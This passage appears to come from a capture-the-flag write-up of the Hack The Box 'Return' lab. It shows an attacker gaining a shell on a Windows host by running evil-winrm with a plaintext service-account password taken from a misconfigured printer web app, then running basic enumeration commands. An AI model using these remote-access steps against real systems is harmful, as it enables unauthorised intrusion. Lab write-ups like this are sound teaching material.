WinRM
Nmap initially discovered a WinRM service running on the target port 5985
However, nothing was due to be done at that time as I didn’t have a valid domain credential.
A moment later, I was able to get a valid domain credential by exploiting a misconfigured web application that oversees printer/s. I later also learned that the compromised user has a membership to the Remote Management Users group that grants the user to WinRM directly into the target system. It was also confirmed through bloodhound as well at a later stage.
While all this bits of information that I gathered so far made me believe that the next attack vector for lateral movement or privilege escalation would be related to exploiting the printer, I will get a foothold on to the target host first.
┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ evil-winrm -i printer.return.local -u svc-printer -p '1edFg43012!!'
Evil-WinRM shell v3.4
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\svc-printer\Documents> whoami
return\svc-printer
*evil-winrm* ps c:\Users\svc-printer\Documents> hostname
printer
*evil-winrm* ps c:\Users\svc-printer\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::1a2
ipv6 address. . . . . . . . . . . : dead:beef::3ca0:8079:2c38:f2ac
link-local ipv6 address . . . . . : fe80::3ca0:8079:2c38:f2ac%10
ipv4 address. . . . . . . . . . . : 10.10.11.108
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%10
10.10.10.2Initial Foothold established to the target system as the svc-printer user via evil-winrm